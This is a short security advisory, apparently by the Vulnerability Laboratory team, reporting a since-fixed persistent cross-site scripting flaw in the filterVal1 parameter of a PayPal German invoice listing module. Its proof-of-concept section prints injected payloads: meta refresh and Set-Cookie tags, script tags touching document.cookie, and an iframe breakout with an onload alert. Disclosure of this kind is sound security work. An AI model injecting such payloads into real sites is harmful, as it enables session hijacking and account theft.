The Vulnerability Laboratory Research Team discovered a persistent input validation vulnerability in the official Paypal ecommerce website content management system.
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). The persistent vulnerability is located in the Artikel pro Seite listing module with the bound vulnerable filterVal1 parameter.
Remote exploitation requires low user inter action or privileged application user account for local exploitation. Successful exploitation of the vulnerability can lead to session hijacking (admin), account steal via persistent web attack or stable (persistent) context manipulation.
Proof of Concept:
=================
The persistent vulnerability can be exploited by remote attackers & local privileged user accounts with low required user inter action.
For demonstration or reproduce ...
Review: [ALL Listing] (index) Rechnungen Verwalten - Geld Anfordern > Artikel pro Seite (Listing) > filterVal1
var currencyVals = ["EUR", "AUD", "BRL", "GBP", "DKK", "HKD", "ILS", "JPY", "CAD", "MXN", "TWD", "NZD", "NOK", "PHP",
"PLN", "SEK", "CHF", "SGD", "THB", "CZK", "HUF", "USD", ""];
var txt1 = "zwischen";
var txt2 = " und ";
var txtLabel = "Wert 2";
var advFilter = "email";
var dateFilter = "invoice_date";
var filterVal1 = "<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;"> <META HTTP-EQUIV="Set-Cookie"
Content="USERID=<SCRIPT>document.cookie=true</script>"> <script>document.cookie=true;</script>
PoC: "><iframe src=http://vuln-lab.com onload=alert("VulnerabilityLab") <
The security risk of the persistent script code inject vulnerability is estimated as medium(+).The vulnerability successfully fixed by Paypal.